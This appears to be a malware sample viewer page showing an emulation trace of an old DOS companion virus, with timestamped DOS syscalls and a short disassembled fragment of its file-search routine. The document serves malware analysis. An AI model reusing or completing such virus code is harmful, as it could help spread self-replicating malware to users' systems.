Sample viewer

vx.netlux.org/Virus.DOS.Companion.Kill.788

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:33:42.686223666Z 26 PC: 12a59 | Set disk transfer address
2018-12-17T22:33:42.68848092Z 42 PC: 12a5d | Get date 0x12a5d: cmp dx, 0x65
0x12a60: jne 0x12a69
0x12a62: mov ah, 9
0x12a64: mov dx, 0x27b
0x12a67: int 0x21
0x12a69: mov ah, 0x47
0x12a6b: mov dl, 0
0x12a6d: mov si, 0x221
0x12a70: int 0x21
0x12a72: mov ah, 0x4e
0x12a74: mov cx, 0
0x12a77: mov dx, 0x264
0x12a7a: int 0x21
0x12a7c: jae 0x12a89
0x12a7e: mov ah, 0x3b
0x12a80: mov dx, 0x261
0x12a83: int 0x21
0x12a85: jb 0x12af1
0x12a87: jmp 0x12a72
0x12a89: mov si, 0x3f9
2018-12-17T22:33:42.691681715Z 71 PC: 12a72 | Get current directory
2018-12-17T22:33:42.694869802Z 78 PC: 12a7c | Find first file
2018-12-17T22:33:42.701914644Z 59 PC: 12a85 | Change current directory
2018-12-17T22:33:42.70662413Z 59 PC: 12af8 | Change current directory
2018-12-17T22:33:42.711078697Z 26 PC: 12aff | Set disk transfer address
2018-12-17T22:33:42.712990358Z 74 PC: 12b51 | Reallocate memory
2018-12-17T22:33:42.734548079Z 75 PC: 12b5c | Execute program
2018-12-17T22:33:42.742099059Z 76 PC: 12b60 | Terminate with return code (Return code = '2')